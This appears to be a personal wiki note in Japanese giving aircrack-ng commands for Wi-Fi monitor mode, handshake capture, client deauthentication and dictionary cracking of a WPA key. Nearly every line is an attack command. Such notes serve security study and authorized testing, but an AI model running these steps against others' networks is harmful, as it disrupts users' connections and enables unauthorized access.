#author("2025-04-15T03:56:37+00:00","default:iseki","iseki") * aircrack-ng [#w968a89e] ** 基本 [#j510cc6e] *** インターフェイスをモニターモードにする [#nc2f0299] **** 準備 [#p3952968] - airmon-ng - airmon-ng check kill **** Managed モードから Monitor モードへ [#c2eb076b] - airmon-ng start wlan0 - iwconfig -- インターフェイス名の後ろに ''mon'' が付く(つかないドライバもある:rtl8814auとか) **** モニターモードの開始の停止 [#h7fff7da] - airmon-ng stop wlan0mon - iwconfig *** パケットをキャプチャする [#y040ff6e] **** 周辺のAPのチェック [#u293e5a5] - airodump-ng wlan0mon -- wlan0mon : モニターモードのインターフェイス名 **** 特定APのチェック [#af311dce] - airodump-ng --bssid 34:76:c5:4d:64:3e wlan0mon -- --bssid : APのMACアドレス **** キャプチャ [#le11ea43] - airodump-ng --bssid 34:76:c5:4d:64:3e wlan0mon -w psk -c 5 -- -w : 出力ファイルのプレフィックス -- -c : チャンネル指定 **** 4way ハンドシェイクのパケットが取れない時 [#o77c4ce6] - aireplay-ng -0 1 -a 34:76:c5:4d:64:3e -c 00:11:22:33:44:55 wlan0mon -- -0 : 認証の取り消し先の数 -- -a : APのMACアドレス -- -c : クライアントのMACアドレス *** 解析 [#fcfdbdae] - aircrack-ng [-w password.lst] -b 34:76:c5:4d:64:3e psk*.cap -- パスパードファイル.あれば指定 -- psk*.cap : airodump が出力したキャプチャファイル *** Sample [#gb4c7c2e] - password aaaaa --